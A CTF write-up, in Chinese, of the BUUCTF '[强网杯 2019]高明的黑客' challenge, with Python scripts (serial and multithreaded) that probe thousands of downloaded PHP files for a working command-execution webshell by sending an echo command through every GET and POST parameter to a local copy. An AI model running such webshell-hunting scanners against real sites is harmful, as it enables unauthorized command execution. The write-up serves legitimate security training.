BUUCTF WEB [强网杯 2019]高明的黑客
打开网页,发现有提示~~源码可下
下载源码,发现3002个文件,查看一下,发现有不少的shell???
不过都是不能用的,其实这道题目就是让我们找到能用的shell,考察的应该是脚本的编写能力吧!!
源码已经down下来了,在本地搭一个环境,php 7.0以上,否则会报语法错误!
然后编写脚本(特别慢):
import requests
import sys
import os
# Base URL of the locally hosted copy of the challenge source, and the
# listing of the downloaded PHP files that the helpers below read.
url = "http://127.0.0.1/src/"
src_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(src_dir)
#print(files)
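# Directory holding the downloaded challenge source. It matches the listdir()
# call above and can be overridden per call for testing.
_SRC_DIR = "C://Users//Administrator//Desktop//www//src"


def _find_params(file, marker, base_dir):
    """Return the names that follow *marker* (``$_GET['`` / ``$_POST['``) in *file*.

    Args:
        file: file name relative to *base_dir*.
        marker: literal prefix to look for, up to and including the opening quote.
        base_dir: directory the file is read from.

    Returns:
        The quoted names, in file order. Every occurrence on a line is collected,
        including one at column 0 (the old ``find(...) > 0`` test skipped those),
        and an occurrence with no closing quote on the same line is skipped
        instead of producing a slice that runs to the end of the line.
    """
    names = []
    # `with` closes the handle on every exit path (the old code never closed it);
    # errors="replace" keeps one undecodable byte in a generated file from
    # aborting the whole scan with UnicodeDecodeError.
    with open(os.path.join(base_dir, file), "r", errors="replace") as fh:
        for line in fh:
            pos = line.find(marker)
            while pos != -1:
                start = pos + len(marker)
                end = line.find("'", start)
                if end == -1:
                    break
                names.append(line[start:end])
                pos = line.find(marker, end)
    return names


def GetGet(file, base_dir=_SRC_DIR):
    """Return the ``$_GET['...']`` parameter names used in *file*."""
    return _find_params(file, "$_GET['", base_dir)


def GetPost(file, base_dir=_SRC_DIR):
    """Return the ``$_POST['...']`` parameter names used in *file*."""
    return _find_params(file, "$_POST['", base_dir)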
def Send():
    """Try every parameter name found in each file against the local copy.

    For each entry of the module-level ``files`` list, the ``$_GET`` names are
    tried first and then the ``$_POST`` names; the first name of each kind whose
    response body contains "Success" is printed and the remaining names of that
    kind are skipped. Reads the module-level ``url``, ``GetGet`` and ``GetPost``.
    """
    for name in files:
        get_names = GetGet(name)
        print("Try filename: %s" % name)
        for param in get_names:
            target = url + "%s?%s=%s" % (name, param, 'echo "Success!!!"')
            reply = requests.get(target)
            if "Success" in reply.text:
                print("Success! Get:%s" % param)
                break
        for param in GetPost(name):
            reply = requests.post(url + "%s" % name, data={param: "echo 'Success!!'"})
            if "Success" in reply.text:
                print("Success! Post:%s" % param)
                break
# Entry point: the whole scan runs as soon as the script is executed
# (there is no __main__ guard, so importing this module starts it too).
Send()
这个脚本垃圾的一批,估计要跑一天,,,太菜了呀,直接放弃掉这个脚本了,,
可是好像也不会多线程啥的呀???哭了!!!搜了一下python3的多线程,改了一下:
import requests
import sys
import os
import threading
import time
# Base URL of the locally hosted copy of the challenge source, and the
# listing of the downloaded PHP files that the worker threads partition.
url = "http://127.0.0.1/src/"
src_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(src_dir)
#print(files)
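# Directory holding the downloaded challenge source. It matches the listdir()
# call above and can be overridden per call for testing.
_SRC_DIR = "C://Users//Administrator//Desktop//www//src"


def _find_params(file, marker, base_dir):
    """Return the names that follow *marker* (``$_GET['`` / ``$_POST['``) in *file*.

    Args:
        file: file name relative to *base_dir*.
        marker: literal prefix to look for, up to and including the opening quote.
        base_dir: directory the file is read from.

    Returns:
        The quoted names, in file order. Every occurrence on a line is collected,
        including one at column 0 (the old ``find(...) > 0`` test skipped those),
        and an occurrence with no closing quote on the same line is skipped
        instead of producing a slice that runs to the end of the line.
    """
    names = []
    # `with` closes the handle on every exit path (the old code never closed it,
    # which matters with 150 threads open at once); errors="replace" keeps one
    # undecodable byte in a generated file from killing a worker thread.
    with open(os.path.join(base_dir, file), "r", errors="replace") as fh:
        for line in fh:
            pos = line.find(marker)
            while pos != -1:
                start = pos + len(marker)
                end = line.find("'", start)
                if end == -1:
                    break
                names.append(line[start:end])
                pos = line.find(marker, end)
    return names


def GetGet(file, base_dir=_SRC_DIR):
    """Return the ``$_GET['...']`` parameter names used in *file*."""
    return _find_params(file, "$_GET['", base_dir)


def GetPost(file, base_dir=_SRC_DIR):
    """Return the ``$_POST['...']`` parameter names used in *file*."""
    return _find_params(file, "$_POST['", base_dir)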
def Send(start, end):
    """Probe the files at indices ``start`` (inclusive) to ``end`` (exclusive).

    Both bounds are coerced with ``int()`` because ``myThread`` passes its
    ``name`` attribute, which ``threading.Thread`` stores as a string. Per file
    the ``$_GET`` names are tried first, then the ``$_POST`` names, and the
    first name of each kind whose response body contains "Success" is printed
    before the remaining names of that kind are skipped. Reads the module-level
    ``files``, ``url``, ``GetGet`` and ``GetPost``.
    """
    lo, hi = int(start), int(end)
    for idx in range(lo, hi):
        name = files[idx]
        get_names = GetGet(name)
        print("Try filename: %s" % name)
        for param in get_names:
            target = url + "%s?%s=%s" % (name, param, 'echo "Success!!!"')
            if "Success" in requests.get(target).text:
                print("Success! Url:%s" % target)
                break
        for param in GetPost(name):
            reply = requests.post(url + "%s" % name, data={param: "echo 'Success!!'"})
            if "Success" in reply.text:
                print("Success! Post:%s" % param)
                break
class myThread(threading.Thread):
    """Worker that scans one slice of ``files`` by calling ``Send``.

    ``name`` is the slice start and ``counter`` its exclusive end. ``name``
    lands on ``threading.Thread.name``, which stores it as a string, which is
    why ``Send`` converts both bounds back with ``int()``.
    """

    def __init__(self, threadID, name, counter):
        super().__init__()
        self.threadID = threadID  # chunk index, informational only
        self.name = name          # slice start; Thread.name keeps it as str
        self.counter = counter    # slice end (exclusive)

    def run(self):
        Send(self.name, self.counter)
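# One worker per chunk of CHUNK consecutive indices into `files`. The chunk
# count is derived from len(files): the fixed 150 x 20 = 3000 indices used
# before leave the tail of a 3002-entry listing (the count reported above)
# unscanned. min() keeps the last slice inside the list so Send() never
# indexes past the end.
CHUNK = 20
for i in range(0, len(files), CHUNK):
    thread = myThread(i // CHUNK, i, min(i + CHUNK, len(files)))
    thread.start()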
跑了大概20多分钟吧,得到了:
直接去进行命令执行!!
最后得到了flag:
尽力了,只能将时间缩减到20多分钟,,,
哪位大佬如果知道更快的方法麻烦指导一下,,,,,感激不尽!!!